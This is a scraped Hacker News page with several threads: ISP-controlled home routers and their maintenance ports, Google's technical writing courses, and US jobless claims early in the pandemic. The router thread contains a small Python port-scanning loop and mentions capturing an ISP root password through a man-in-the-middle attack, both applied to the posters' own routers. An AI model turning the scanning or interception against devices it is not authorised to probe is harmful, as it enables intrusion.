Maybe it's a remote administration port for your ISP. I have a router provided by Frontier, formerly Verizon FiOS, where port 4567 is always open and cannot be closed with a firewall rule from the router's web UI (it's grayed out). After some googling I found out that it's their maintenance port: https://www.speedguide.net/port.php?port=4567

For a while I had my own OpenWRT router in place of the ISP one, but I think they got wise to it and blocked the MAC. I changed it to match the ISP router's MAC address, but it only worked for about 3 minutes before being blocked again.

jason0597(4169) 2 days ago [-]

It's funny to think that if you were to report all of your findings to your local newspaper (a Turkish newspaper in this case), say how Turkish ISPs have complete access to your router or how Huawei (China) has an SSH key for your router, people would go absolutely ballistic. But for us it's just another day of expected craziness, and we're tired of talking about it.

kuesji(10000) 2 days ago [-]

I don't think many people care about this. (Yes, I live in Turkey.)

Someone1234(4336) 2 days ago [-]

> how Turkish ISPs have complete access to your router

You think it is going to blow people's socks off that a router provided and controlled by an ISP is accessible by that same ISP? Huh?

The Huawei SSH key is a little strange, but depressingly common for network equipment, even big names like Cisco[0].

[0] https://tools.cisco.com/security/center/content/CiscoSecurit...

p1esk(2616) 2 days ago [-]

Yeah, no one cares outside of Hacker News.

Thaxll(10000) 2 days ago [-]

That's only a problem if that stuff listens on the interface with your public IP, which is most likely not the case. But yes, it's still scary.

closeparen(4235) 2 days ago [-]

CPE is just part of the ISP's infrastructure that happens to be in your house. There is no need to trust it. Just put your own router in front of it.

TheSpiceIsLife(4188) 2 days ago [-]

> if you were to report all of your findings to your local newspaper ... people would go absolutely ballistic.

You reckon? I don't think they'd even be interested in hearing about it.

Where do you live and who is your local paper that leads you to believe they'd bother writing, let alone publishing, such a story?

kspacewalk2(10000) 2 days ago [-]

Turkish newspapers are almost universally subservient to the autocratic government. Any free press that's still somehow around has way more consequential dictatorial abuses of power to report on, if they dare.

0xff00ffee(4313) 1 day ago [-]

I'm pretty sure my new CenturyLink fiber router is similar. I tried to create a PPPoE connection from my WRT1900 directly to CenturyLink using the same credentials and I couldn't connect to the internet. However, now I am motivated to create a bridge and find out why.

For CenturyLink fiber I have two boxes:

Box A: the exterior fiber enters this box; the tech said it was a 'translator'. The port-4 Ethernet jack on it goes to ...

Box B: the CenturyLink wireless router, which performs the PPPoE with my credentials, which were somehow hardwired because no one ever told me my username/password. I'm guessing TR-069? Then port 4 on this goes to ...

Box C: MY WRT1900AC, which then goes to other subnets for my cameras, lab, and office.

I figured Box B was redundant, but trying to remove it has been problematic.

0xff00ffee(4313) 1 day ago [-]

Why did port 8015 show up on the remote system after resetting firmware? Shouldn't nmap have reported that?

usmannk(10000) 1 day ago [-]

It was a "fast nmap", so only the top 100 most common ports were checked.
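
So a fuller sweep would have caught it (nmap's -p- flag scans the whole range). For the curious, a dependency-free, if slow, sketch of the same idea, with the router address as a stand-in:

  import socket

  HOST = "192.168.1.1"   # stand-in for the router under test
  for port in range(1, 65536):
      s = socket.socket()
      s.settimeout(0.2)
      if s.connect_ex((HOST, port)) == 0:   # 0 means the TCP connect succeeded
          print("open:", port)
      s.close()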

zeroflow(10000) 2 days ago [-]

...and that's why my ISP's router is running in modem mode with a non-ISP-controlled router from Ubiquiti behind it, which I may replace with a pfSense box in the future.

I'm pretty happy that my cable ISP is allowing this mode so I don't have to double-NAT in my setup.

matheusmoreira(10000) 2 days ago [-]

You're lucky your ISP's router offers that option. My ISP's VDSL2 router would require 'unlocking' in order to get bridge mode, and it can't easily be replaced.

pwg(302) 2 days ago [-]

This is why, in my case, the ISP's router (that awful box Verizon provides with FiOS) is sitting beside the demarc, unplugged and powered off.

My demarc has a hot Ethernet jack, and my firewall (a PC running Linux that I control) is connected to that jack. No ISP shenanigans (other than what they can remotely do to configure the FiOS demarc itself).

awelkie(4267) 2 days ago [-]

If your ISP didn't have that feature, could you just replace the cable modem too? My ISP's router is running EuroDOCSIS 3.0 and I'm wondering if I could replace the router with a modem + router of my own.

skoskie(10000) 2 days ago [-]

I have been so disappointed with my Ubiquiti hardware. The UI is gorgeous, but it lacks some real functionality that I need. I can't block BitTorrent (see forums). And I can't see a detailed traffic log, only the categories. Plus, those pretty graphs that tell you how much data you've used don't give a time frame; I have no idea if it's a week or a month.

I think pfSense will be my next one too.

bonestamp2(10000) 2 days ago [-]

I recently upgraded my internet speed and my pfSense box was limiting my top download speed. So, I just went from pfSense to a Ubiquiti Secure Gateway. There are pros and cons of each, but I couldn't find any trustworthy pfSense hardware with the performance of a USG for anywhere near the same price. I do miss the configurability of pfSense though so I might switch back some day. That said, the ubiquiti interface and provisioning model is really slick.

chrisweekly(4088) 2 days ago [-]

I'd be grateful for guidance, e.g. a link to a write-up of recommended hardware and config for a reasonably technical audience, e.g. 'Given a Verizon FIOS G1100, put it in bridge mode and connect hardware that supports software X'...

miki123211(3959) 2 days ago [-]

Apparently a Polish carrier called Multimedia has recently introduced a new, revolutionary service for some customers. It's called 'set up a custom Wi-Fi configuration', and it's just 5 PLN (a little over $1)! It lets you think up an SSID and password and configure your router to use them! That's an amazing invention, isn't it? /s

Some customers apparently have absolutely no access to their routers, not even to the web interface, and they can't use their own either. All reconfiguration must be done through the customer service portal or by phone. That means the carrier can charge for every little thing, including changing the Wi-Fi config! I'm not sure if you can even bridge, but I guess not. Note that this does not affect all customers of that carrier, just a minority.

gbrown(10000) 2 days ago [-]

Couldn't you just daisy chain a second router via Ethernet and use it? Bonus points for VPN-ing all of your traffic.

jscholes(2970) 2 days ago [-]

Enjoyed this write-up, but most of the exploration seemed to be facilitated by someone having already leaked the CLI root password online. Does anyone have suggestions on how you might otherwise obtain that information?

paddlesteamer(10000) 1 day ago [-]

Hi, OP here. Actually, that's not true. Think of the scenario like this: you don't have the CLI root password, but you do a MitM attack and learn the root password when your ISP attempts to change it. That's what happened in my case; I could also have learned the default password just by looking into the firmware.

LeonM(4231) 2 days ago [-]

In the Netherlands we now have a law under which ISPs must allow your own choice of network equipment. This means they must give you the information required to connect your own device to their network.

I have a fiber connection, which I connected directly to a Ubiquiti router through a suitable SFP module. My ISP supplied the information on the fiber type and which VLAN IDs to set up for internet, TV and telephony.

This way I have my own equipment, that I control myself. The 'modem' [0] which my ISP supplied is still in its original, unopened box.

lima(4184) 2 days ago [-]

Same in Germany! ISPs hate it because it makes their lives a lot harder: in cable networks, they now have to deal with a zoo of endpoints on a shared medium vs. a small set of standardized devices.

As a customer, I like it.

hiram112(4342) 2 days ago [-]

What's your cost and speed for the fiber?

Also, if you didn't need so much bandwidth, is it possible to just order a basic 100Mb/10Mb connection for a nominal fee of, say, 30 euros?

The speeds in the US aren't actually that bad, but you're basically forced to pay for everything: paid cable TV, equipment rental fees, etc., and your $40 plan ends up creeping towards $100/month after the fees and taxes, with increases every year.

msla(4288) 2 days ago [-]

I have Spectrum cable Internet. I use their modem, but I supply my own router, and they've never given me any trouble. In fact, they recently upgraded my modem (from a Scientific Atlanta 2203C to a Ubee E31U2V1) and they didn't send me a router. The Ubee E31U2V1, like the Scientific Atlanta 2203C before it, only has one Ethernet port, and their official guide to getting the new modem working involved rebooting an external router, so there's no possible way they have a problem with customer-owned routers.

Which works out great for me. I can use OpenWRT with no hassle.

More to the point, I see the cable stuff as 'ISP land' in that it's directly interfacing with their internal hardware, and so has to dance to their tune very directly, whereas Ethernet and TCP/IP are common, and so will obey my rules in my home. I don't expect my modem to perform adblocking, which is why my router does it, and I'm not going to be stupid and try to 'uncap' my modem to get more speed, so I don't see a point to being able to provide my own cable modem. As long as I can own the router which provides the only path in and out of my LAN, I can do everything I'm capable of doing anyway, as far as I can see.

markus92(10000) 2 days ago [-]

It's become more common for DSL, but I haven't heard of anyone using their own DOCSIS modem with Ziggo. Have you?

r1ch(4022) 2 days ago [-]

Do you know if this applies to cable modems too? Are they required to allow a 3rd party modem that they normally wouldn't provide to customers?

avip(4206) 1 day ago [-]

This law is a tech-support nightmare.

You can call your ISP with any arbitrary piece of non-branded, random AliExpress $#@$ of network equipment, and they must walk you through configuring it? That does not make much sense to me.

grawlinson(10000) 1 day ago [-]

It's the same in New Zealand, my particular ISP offers IPoE[0]. I have a repurposed PowerEdge R210II connected as a firewall/router.

[0]:https://en.wikipedia.org/wiki/IPoE

hedora(3864) 2 days ago [-]

The US has (had?) some network neutrality rules around discriminating against different types of hardware, but AT&T just does it anyway. (They require you to use their DSL modem + router + wifi and it has broken support for adding a second router behind it.)

thinkloop(3678) 2 days ago [-]

How can you do without the modem? Which Ubiquiti product is that?

cameronh90(10000) 2 days ago [-]

As far as I'm aware, the UK doesn't have a law like this, but I've never had a situation where an ISP cared; they just tell you that if you have problems they might not be able to help. I think you get interop issues with TV and landline with those ISPs where everything is bundled into one fibre, but the internet bit usually works fine.

jedimastert(4221) 1 day ago [-]

I don't know if it's 'law' in America, but I've never seen a major ISP give any more guff than sometimes making a technician come out to read the modem's MAC address. I've never had an ISP's router or modem on my networks.

PascLeRasc(1537) 2 days ago [-]

Slightly off-topic: I'd really like to run screenfetch on my router (Asus RT-N66U), but it doesn't have enough free space to sftp the script to it [1]. Piping the script just freezes up. Does anyone know a good workaround? Has anyone ever tried this?

[1] https://unix.stackexchange.com/questions/510947/how-can-i-ru...

Topgamer7(4333) 2 days ago [-]

Check if your router has tmpfs mounted. IIRC that's RAM-backed, so it should have enough space for you to upload the script and run it from there.
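
A quick way to check, as a sketch; this assumes key-based SSH login to the router and a readable /proc, and the login string is a placeholder:

  import subprocess

  # Ask the router which filesystems are RAM-backed.
  mounts = subprocess.run(
      ["ssh", "root@192.168.1.1", "cat /proc/mounts"],
      capture_output=True, text=True, check=True,
  ).stdout
  for line in mounts.splitlines():
      if "tmpfs" in line:
          print(line)   # e.g. /tmp; scp the script there and run it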

skizm(10000) 1 day ago [-]

My ISP has a cloud access 'feature'. If I go to 192.168.1.1 it redirects me to their 'router.MYISP.net' site. What's the best way to go about disabling this? Should I just dump the rented router for my own?

simplyinfinity(4061) 1 day ago [-]

Asus (and others) have the same feature. In my case it's a simple redirect from the IP 192.168.1.1 to router.myasus.com, which has a DNS record of 192.168.1.1. So all it does is redirect to a domain.
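
You can verify that for yourself. A one-line sketch; the hostname is the one from this comment, and whether the vendor publishes such a public A record may vary:

  import socket

  # If the record exists, this prints a private address such as 192.168.1.1,
  # i.e. the "cloud" URL never leaves your LAN.
  print(socket.gethostbyname("router.myasus.com"))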





Historical Discussions: Technical Writing Courses (March 22, 2020: 563 points)
Technical Writing Course by Google (February 28, 2020: 18 points)
Google's Technical Writing Courses for Engineers (February 27, 2020: 10 points)
Technical Writing Courses (March 03, 2020: 5 points)
Technical Writing Courses for Engineers (February 29, 2020: 2 points)
Technical Writing Courses for Engineers (February 29, 2020: 2 points)
Technical Writing Courses for Engineers (February 28, 2020: 2 points)
Technical Writing – Google Developers (March 04, 2020: 1 points)

(563) Technical Writing Courses

563 points 6 days ago by Lilian_Lee in 4189th position

developers.google.com | | comments | anchor

We've aimed these courses at people in the following roles:

  • professional software engineers
  • computer science students
  • engineering-adjacent roles, such as product managers

You need at least a little writing proficiency in English, but you don't need to be a strong writer to take these courses.

You will find these courses easier to understand if you have at least a little background in coding, though you don't need to be an expert coder.

These courses focus on technical writing, not on general English writing or business writing.




All Comments: [-] | anchor

breckenedge(10000) 6 days ago [-]

I graduated with a BA in English with a Technical Writing concentration 15 years ago. I did the job for a few years and, honestly, it sucked. At best, I was treated like an idiot by developers. Developer aloofness seemed much worse back then; they were never wrong. I was always at the end of the software development cycle, so there was never enough time budgeted to do good work. Management couldn't decide if I was a tester or a writer, so I often had to fill both roles. The rapid nature of software development today is great for users and developers, but lends itself to rapidly expiring documentation. I did the job long enough to teach myself software development. I switched over to being a software dev ten years ago and have never regretted it. Entry-level pay as a software dev was better than experienced pay as a technical writer. I have been asked to write documentation, and I'm glad to do it, just not as my primary duty.

hinkley(4243) 6 days ago [-]

Twice I've seen a tech writer turn into de facto project manager because the real manager was asleep at the wheel.

Without real requirements how can anything ever be done? If nothing is done how do we get paid? If nothing is done and we have no money then what the fuck are you managing? Nearly every secretary or office assistant I've worked with has been more useful than the worst managers, and at less than half the salary. I have called this type of manager a glorified secretary before but that's disrespectful to secretaries.

hnarn(10000) 6 days ago [-]

Your comment makes me think that writing primary documentation should always be the job of developers, with time dedicated for the task, and technical writers can do the polishing and categorization that will likely be necessary for it to be published. Being the only one responsible for documentation while not being a developer must be a nightmare.

specialist(10000) 6 days ago [-]

TLDR: Redesign the product until its description makes sense.

I've done some technical writing. It's hard work. One open source tool I made, I spent more time on the docs than on the actual code.

Press releases, manuals, installation instructions, etc. can be great QA/QC tools. If something is hard to communicate, then the subject itself is probably too complicated. Or just badly designed. Go back and simplify.

One stretch, I was also the engineering manager for a handful of products. So I had the juice to compel improvement.

The manuals and installation instructions were, um, challenging. I made the teams reengineer installers, UIs, workflows, whatever until the technical writing made sense. Other benefits included greatly reducing defects and technical support calls.

--

I also put the QA test team members in charge of our releases. To great effect. Which I haven't seen anyone else do before or since. But that's another story.

I only mention it to acknowledge that most orgs treat writers and testers like crap. Like you experienced. Which is unfortunate, wasteful, and rude.

daxfohl(4258) 6 days ago [-]

I'd love a technical PowerPoint course. I find writing to be pretty straightforward. But when my manager is like 'can you create a couple slides about...', total deer in the headlights.

nogabebop23(10000) 6 days ago [-]

Maybe your anxiety is because you're focusing on 'make some slides' vs. 'deliver content in a presentation format'. If you adhere to guidance for the latter, the slides are actually pretty easy. You quickly realize they are just a prop that supplements the entire production.

I found the video 'How To Speak by Patrick Winston' delivered to new MIT students to be very helpful:

https://www.youtube.com/watch?v=Unzc731iCUY

Careful: once you become attuned to PowerPoint failures you will have little tolerance for them, from both other people and yourself, and good presentations are a lot of work!

benjanik(10000) 6 days ago [-]

Do you find the problem to be more around design or storytelling?

ct520(10000) 6 days ago [-]

I know right.. Any similar resources for this?

jedberg(2144) 6 days ago [-]

This book completely changed how I give presentations.

https://www.amazon.com/Presentation-Patterns-Techniques-Craf...

You can find it on the internet at various price points.

I even had a chance to give a technical presentation in front of the author and he said it was excellent, so apparently I internalized its lessons.

enriquto(10000) 6 days ago [-]

> But when manager is like 'can you create a couple slides about....' total deer in the headlights.

I'm just like that. But I received wisdom from a friend that helped me a lot. The following 'three' rules:

RULE 1. No bullet lists

RULE 2. No bullet lists

RULE 3. At least one meaningful image per slide, covering more than 50% of its surface

Then, you explain your subject like you would to a friend in a bar, keeping the slides as useful side material.

oggy(4344) 6 days ago [-]

I've attended several short courses on giving presentations. This one by an ETH Zurich professor is the best one I know of:

https://inf.ethz.ch/personal/markusp/teaching/guides/guide-p...

He has a list of useful books at the end (I haven't read any of them, though)

ghaff(3612) 6 days ago [-]

Presentation Patterns, which a couple of people have mentioned, is probably more practical than most in terms of giving bite-sized advice though a lot of it is overkill (and not really even appropriate) for giving a manager a couple of slides about something.

The thing with most of the presentation books out there like Presentation Zen is that they're really oriented towards a good presenter up on a keynote stage at an event using slides as a supporting element of a well-rehearsed presentation.

That's not your typical presentation, and certainly not your typical internal monthly status meeting or project update.

Presentation Patterns also seems to do a better job than most at acknowledging the realities of material that's both presented and needs a leave behind. The 'standard' advice is that you should have two separate documents but that's really not practical in a lot of circumstances.

polcia(10000) 6 days ago [-]

What do you think: should technical writing be part of engineers' daily jobs, or is it OK for a company to hire people with less technical skill/experience, such as Bachelor-of-Arts graduates in the target language, to do these tasks?

xaedes(4019) 5 days ago [-]

I am very happy to have (technical writing) experts helping with their expertise. That is how I want the culture to see their role.

Maybe a bit over-simplified: SW-Devs talk to the machines, Doc-writers talk to the people. If you can't make the machines understand what you want it to do, you fail. If you can't make the people understand what to do with your precious developed system, you fail.

therealdrag0(10000) 6 days ago [-]

I think it is an area of work that (given a large enough company) benefits from having dedicated owners. Engineers have too many other things pulling at them, whether it's deadlines or just code they'd rather be working on.

Some devs will take an interest in documentation, but most won't. Most seem to just do a single mind dump and call it good, no better than the college essay they got a C on. There's also real value in having someone own the organization of the writing.

aliabd(3842) 6 days ago [-]

I've been working on this tool for a while that makes documentation easier and faster. The main idea is to have the code itself be the driver. Would love some feedback: https://trymaniac.com

Aliabid94(10000) 6 days ago [-]

This is something that I've felt is going to become very hot: some way of ensuring that documentation never goes stale. In the same vein as tests needing to pass before merging a commit, ensuring documentation is up to date when committing. Looking forward to hearing more!

cmurf(1699) 6 days ago [-]

The staggered screenshots that are ostensibly examples are all blank?

Update: I see it works in Chrome but not in Firefox. Not sure why.

j88439h84(10000) 6 days ago [-]

Whoa.

j88439h84(10000) 6 days ago [-]

I want diagrams of my modules and how things are connected, such as one that shows 'types defined in foo.py are used in bar.py'. While you're generating docs from code, you might think about diagrams.

boojing(10000) 6 days ago [-]

The content seems good but I'm not a fan of the way the sections are laid out on the introduction page. The courses should at the very least have hyperlinks for each of the learning objectives.

mattlutze(4312) 6 days ago [-]

There's a lesson overview on the left-side navigation, and an inner-lesson table of contents on the right-side navigation, which links to each topic or learning objective.

If you're on a narrow format it looks like that table of contents is set into the top of the article below the lesson title.

205guy(4284) 6 days ago [-]

I found that turning my tablet sideways revealed a sidebar with links to each section of the courses. Sometimes responsive UI is not better.

yihsiu(10000) 6 days ago [-]

I actually prefer the way it is. When there are too many links around, I tend to do some DFS-like reading, and it ends in anxiety and tons of tabs. Things get worse when there are loops.

205guy(4284) 6 days ago [-]

This is why "nobody reads documentation." These courses are typical tech-writer overkill, missing the forest for the trees, then getting lost in the weeds (if I may mix a few metaphors). There is too much introduction and setup, then it jumps into the nitty-gritty, but never gives the big picture.

Assuming this was written by the Google tech writers, I'm surprised at how middle-of-the-road the offering is. I kinda assumed they had an academic-like cutting-edge writing department.

To write documentation, you need 2 things: an understanding of the subject matter, and a high-level understanding of what the readers want to do. The reader doesn't want to use your API to list resources, the reader wants to give his/her users a list of resources for further operations. So you don't give a trivial example of getting the list of providers, you give an example of how to display providers by getting the list and processing the various useful fields.

It also helps if the API or UI or whatever is logical and consistent to begin with.

watwut(10000) 6 days ago [-]

To me, as someone who often reads documentation, the lack of the things outlined in that course makes it harder. Not defining terms before using them is something I have sworn about a lot. Documentation with long, complicated sentences is hard to follow.

I read the course; there was a three-click setup and then I was choosing topics to read about. I did not get lost and it was short. None of that seemed like overkill to me.

chiefalchemist(4168) 6 days ago [-]

Perhaps their newer products have gotten better, but I've traditionally found Google's documentation to be a case study in how _not_ to write docs. Typically, the docs seem to be written for people who already understand the product and/or situation. You know, the type of people who don't need the docs.

I'm going to check this out. But looking to Google for advice on docs is like looking to Google for advice on design and/or UX. You don't bother. There are higher quality sources of such info.

federicoponzi(746) 6 days ago [-]

Really interesting comment, thanks! Do you have any more tips for improving at technical writing? Do you know of any other good books or courses on this matter?

chiefalchemist(4168) 6 days ago [-]

> To write documentation, you need 2 things: an understanding of the subject matter, and a high-level understanding of what the readers want to do.

Yes. But this list is incomplete. In fact, it's missing the two essential questions that go into _any_ communication:

1) Who is the audience?

2) What do / don't they already know?

How you explain what they want to do is a direct function of who they are and their current knowledge toolbox (if you will).

The vast majority of tech docs suck because too often the sender assumes the receiver is just like them. That is, the sender fails to put themselves aside; fails to put themselves in the shoes of the receiver.

oggy(4344) 6 days ago [-]

Great comment about missing the forest for the trees. The course outline reminds me of an article on 'writing great code' that lists the rules of a code formatter.

My personal tips for writing docs:

1. Think about what you need to get across and to whom. I've found this categorization helpful (just don't get religious about it): https://www.writethedocs.org/videos/eu/2017/the-four-kinds-o...

2. Try to say whatever you're saying with as few words as possible. 'Vigorous writing is concise' is probably the best takeaway I got from Strunk & White (not a huge fan of the book otherwise).

3. Do a few passes. 'Keep rewriting' is probably the best takeaway I got from 'On Writing Well' (but I like that book in general).

open-source-ux(395) 6 days ago [-]

I like these 10 tips for clear writing from the GOV.UK team. The tips can be used by anyone to help their writing and are not specific to technical writing.

(To skip the podcast, scroll down the page to see the list of 10 tips)

https://gds.blog.gov.uk/2019/08/27/podcast-on-writing/

The 'Writing for GOV.UK' guide is also full of good writing advice for people publishing content on the web:

https://www.gov.uk/guidance/content-design/writing-for-gov-u...

Metus(10000) 6 days ago [-]

Related are the atrocious user manuals and tutorials for various consumer electronics products. You get descriptions like 'if the self-diagnostic tool shows the message 'no errors found', it means that there are no errors that the self-diagnostic can see.' Or other manuals or help texts that just plain rephrase the prompt.

Good technical writing is much like teaching a great course: Empowering the reader to use the product or service for their own purposes.

jseliger(16) 6 days ago [-]

These courses are typical tech-writer overkill, missing the forest for the trees, then getting lost in the weeds (if I may mix a few metaphors). There is too much introduction and setup, then it jumps into the nitty-gritty, but never gives the big picture.

The real challenge is that no one agrees on what great writing really is or how to teach it. The problems are conceptual and related to the nature of writing, thinking, and communicating, all fields that are unsolved. I've taught writing in universities and written about the challenges of writing (and the related grading challenges) before. https://jakeseliger.com/2014/12/20/subjectivity-in-writing-a...

'The big picture' is often the world itself.

mattlutze(4312) 6 days ago [-]

After reading some of the comments here, I'm wondering if people are actually following the link and reviewing the content.

The two courses are well-structured. Each course has an overall outline listing each lesson, and each lesson has a table of contents giving an overview of the topics therein. The courses highlight the major topics in technical writing and do so with easy-to-internalize tenets. I'd have loved for my university coursework to be so clearly organized.

Some highlights include defining your audience[1], engaging your audience[2] and reviewing how short and clear sentences improve comprehension[3].

1: https://developers.google.com/tech-writing/one/audience#defi...

2: https://developers.google.com/tech-writing/one/active-voice

3: https://developers.google.com/tech-writing/one/short-sentenc...

205guy(4284) 6 days ago [-]

Your reference 1 is a deep-link that skips the intro. The intro says:

> The course designers believe that you are probably comfortable with mathematics. Therefore, this unit begins with an equation:

> good documentation = knowledge and skills your audience needs to do a task − your audience's current knowledge and skills

> In other words, make sure your document provides the information your audience needs that your audience doesn't already have. Therefore, this unit explains how to do the following: ...

This is the kind of fluff that turns many people off. Worse, it is confusing and tries to make a formula out of a sentence. The whole thing could've been replaced with the first sentence of the 3rd paragraph I quoted.

Your reference 2 contains this gem:

> Short sentences communicate more powerfully than long sentences, and short sentences are usually easier to understand than long sentences.

And the section title immediately after that sentence is:

> Focus each sentence on a single idea

pdr2020(10000) 6 days ago [-]

tenets, not tenants.

Too(10000) 6 days ago [-]

Good resource. One common flaw I see in a lot of technical writing, which I missed from the course, is treating the reader as a complete puppet: giving copy-paste instructions on what to do, but not explaining what's happening underneath.

Better to teach a man to fish than to give him a fish. Or, better condensed by Fred Brooks's famous quote from The Mythical Man-Month: show me your flowcharts and conceal your tables, and I shall continue to be mystified. Show me your tables, and I won't usually need your flowcharts; they'll be obvious.

ghaff(3612) 6 days ago [-]

To be honest, that's a problem with a lot of in-person workshops and the like as well. There's a lot of 'type this, type that, run this script', etc., without enough context as to why you're doing these various steps.





Historical Discussions: 3.28M file for U.S. jobless benefits (March 26, 2020: 547 points)

(554) 3.28M file for U.S. jobless benefits

554 points 2 days ago by treyfitty in 4266th position

www.wsj.com | | comments | anchor

WASHINGTON—A record 3.28 million workers applied for unemployment benefits last week as the new coronavirus hit the U.S. economy, marking an abrupt end to the nation's historic, decadelong run of job growth.

The number of Americans filing for claims was nearly five times the previous record high. The surge was for the week ended March 21 and could rise further. Pennsylvania, Ohio and California were among 10 states reporting more than 100,000 claims, leaving unemployment systems overloaded.

...



All Comments: [-] | anchor

AtlasBarfed(10000) 1 day ago [-]

If the US were smart (big if...)

The pandemic quarantine will accumulate pent-up demand, or at least a desire to consume once it is 'over'.

A good economic recovery plan would provide enough money to fund this demand and immediately reward rehiring people to previous levels.

But instead this will be a series of discredited supply-side measures until (perhaps) a Keynesian-friendly Democrat is in office.

treyfitty(4266) 1 day ago [-]

Pent-up demand for what? I'm being half facetious here, but something of this magnitude and rarity will likely cause a shift in our world-views. This whole talk of 'pent-up demand' from Econ 101 really leads me to believe the system is guided by shibboleths and buzz phrases.

Let's be real for a second: this pandemic will fundamentally change consumption as we recalibrate just how much we "need" that new shiny thing.

big_chungus(2220) 2 days ago [-]

For this not to bankrupt the nation and retard our growth for the next twenty-five years, we need to all go back to work, today. Even if coronavirus kills a million people, the rest will probably be fine in the long term. If we shut down the economy, three hundred million will be affected. This 'flattening the curve' business is clearly not worth it.

You cannot shut down the economy. There is only so much we can borrow. The Fed is buying debt right and left, and the government surely doesn't want to borrow money and remove that liquidity. So the Fed will buy T-bills instead and probably have to inflate the currency to pay for it all. We could end up spending orders of magnitude more than $2 trillion on further hand-outs, so we could end up with another period of stagflation. Unless we want to retard our growth and prosperity for the next 25 years, we all have to go back, consequences aside. Vulnerable people need to stay home for months until this blows over; it's not the responsibility of the rest of us to lose our jobs for the sake of a few others. Doctors say we have to stay home, but as doctors, they naturally prioritize health. As the saying goes, if you have a hammer, everything looks like a nail.

Like many other problems, there are diminishing returns as we approach either extreme of opening the economy or shutting it down. This extreme clearly isn't working. The at-risk million stay home; everyone else goes to work.

newhotelowner(10000) 2 days ago [-]

> The fed is buying debt right and left, and the government surely doesn't want to borrow money and remove that liquidity.

That's why the tax cut was a bad idea. It should have been a tax increase. We should be saving more in good times so that we have enough for the downturn.

If we had a safety net like UBI, we wouldn't be spending $2 trillion.

It's time for UBI and some wealth redistribution for proper prosperity and growth.

I paid $14 in federal taxes for every $100 I made in 2019. I am in the top 1% of earners in my state and nationwide. That is just ridiculous.

Kaze404(10000) 2 days ago [-]

One thing I don't understand about this line of thinking is how you expect sick people to work. Sure, not everyone will die, but a significant portion of the population will get infected and need, at the very least, to stay home for a week or two. How is that situation better than where we're at now?

Slartie(4249) 2 days ago [-]

How do you expect to 'motivate' people to just go to work, spend money in restaurants, fly around, take cruises... as if nothing were going on, while at the same time millions of people are dying? Everyone is going to have someone in their family who dies because of this virus. And they're not going to die silently: you'll have crazy imagery of emergency rooms spilling over with patients circulating among the public. And I'm not speaking about 'media hype'; since this will hit all hospitals, people will just have to look left and right in their hometown to see the catastrophe evolving.

Are you planning to force people to take vacations, eat out, and do their 'normal' stuff while this is unfolding? Because without excessive force, nobody will do that. You'll have open businesses, but they won't have any customers for months while the above pans out. And probably for quite a while after, because this event will rip a gaping wound into the conscience of the American people, probably larger than 9/11 did.

fallingfrog(4209) 2 days ago [-]

Things that Coronavirus is teaching us:

-the people who are actually vital to keeping the economy running are grocery clerks, doctors, nurses, teachers and other carers, not corporate CEOs, who are ultimately just dead weight.

-money is imaginary and they can print as much as they want.

-the people in power right now would rather have the stock market crash and watch you and a million other Americans die than give healthcare to everyone, even in the middle of a pandemic. How much would it help to have a centralized, organized response where everyone gets tested early right now? But it's impossible, because it would mean giving health care to poor people.

-capitalism is a beast that dies if it cannot grow. People work mostly to pay rent and debts. They pay rent so the landlord can pay the mortgage. The bank has already lent out the money they expect to get from people paying the mortgage- so if property owners don't pay their monthly bill, the whole financial system has a heart attack. Same thing with corporate debt. The corporation is assuming that you're going to buy crap you don't need. If you don't, then they can't pay their massive debts and again the whole system seizes up. So the primary reason we spend all our useful hours at work is so that we can make numbers bigger at the bank. And all of these debts, ultimately, are paid off on the backs of the working class. But the whole system can't be reduced, or paused, or even slowed down- it must grow exponentially more and more, consuming more and more resources forever, or else it craters in a devastating crash and cannibalizes itself on the way down.

smileysteve(10000) 2 days ago [-]

There are 2 policy options I see moving forward:

Public: Healthcare and Unemployment (possibly sick leave)

Private: Forced GAAP accounting for 2-4 weeks of sick leave for all employees (including gig contractors)

These would be matters of national security, so they could potentially receive backing loans or even defense-budget funding.

rchaud(10000) 2 days ago [-]

I'm not sure if the lessons will be interpreted in this way, or even remembered once things go back to some form of normalcy, at least for the monied classes that hold the largest microphones in our society.

The lesson learned from the conflict in Vietnam was not that 'war is a racket' or that 'the US shouldn't intervene militarily unless it's a last resort'. It was simply that 'the US should use proxies where possible and only intervene where the opposition has a limited capacity to fight back'.

And even then, they've greatly overestimated their strength in these conflicts. Because the people with the largest microphones said it would be enough to win.

csomar(721) 2 days ago [-]

> A week ago, he said he had "a good middle-class job" which paid him $35.50 an hour plus health care and retirement benefits. Now he is struggling to figure out how he'll pay a $300 electric bill and $1,000 in rent for his townhouse. He also lost his health insurance.

You make $35.50/hour in (I suppose?) a stable job, but if the work stops for a week, you struggle with a $300 bill? I know some people live paycheck to paycheck, but starting from a certain income you should build a safety net. What about your IRA? What about your credit score? What about small investments?

It looks like some people are living dollar to dollar without putting any money aside. This might be what makes this even harder on the economy.

ithinkinstereo(10000) 2 days ago [-]

I went to my local 7-11 a couple of weeks ago to get some cash at the ATM. Next to it was a garbage bin for throwing away your receipt.

Out of curiosity, I went through about a dozen of them, and not a single one showed a balance above $1,000. Most were below $500.

There is little financial literacy in this country. Basic lessons about opening a bank account, the difference between checking and savings, etc. are not taught in K-12 or in college, let alone more 'advanced' topics like 401(k)s, IRAs, and investing in the stock market.

sodafountan(10000) 2 days ago [-]

Well, here's the thing about that: people were actively incentivized not to save cash, given low interest rates and a booming stock market. I know for myself personally that I'm heavily invested in the markets, just because that's what worked best for almost a decade. Nobody saw this coming.

Now you have to debate selling your stock at such low prices and realizing huge losses, or paying your bills. I think most people are going to try to hold out for unemployment or use credit before they do that.

big_chungus(2220) 2 days ago [-]

This is exactly right. The economy has grown to unsustainable levels based on the economic habits of the average American who can't be bothered to save, hence the crash we're seeing now. At sixty hours a week, that guy should be making six figures pre-tax. There is zero excuse for not saving. Everyone should save at least six months of salary for emergencies; though a few people legitimately can't, most Americans simply don't bother because they'd rather spend that money on the new iPhone.

Edit: Williamdclt, I'll answer your question here due to rate-limiting.

Yes, lots of us do; I've been working that way since internships in high school. Same with many others I know. Usually, though, it's close to 12 hours a day and none on Saturday, or maybe 11 a day and a little on the weekend. Not an issue so long as you plan about an hour a day for something fun and mindless, and leave weekends free to do chores/relax.

Edit: Consz, responding here due to rate-limiting.

Not all of us live in the same world. I'm glad to hear you and your friends are doing well, but that's not representative of everyone. I do because I'm currently hourly, and that's true of many of the people I mentioned. When every additional hour worked has more money associated with it, most people will work more; that's not silly. The downside is, of course, there's a distinct opportunity cost to taking time off, so I don't do so much of that.

wmeredith(2833) 2 days ago [-]

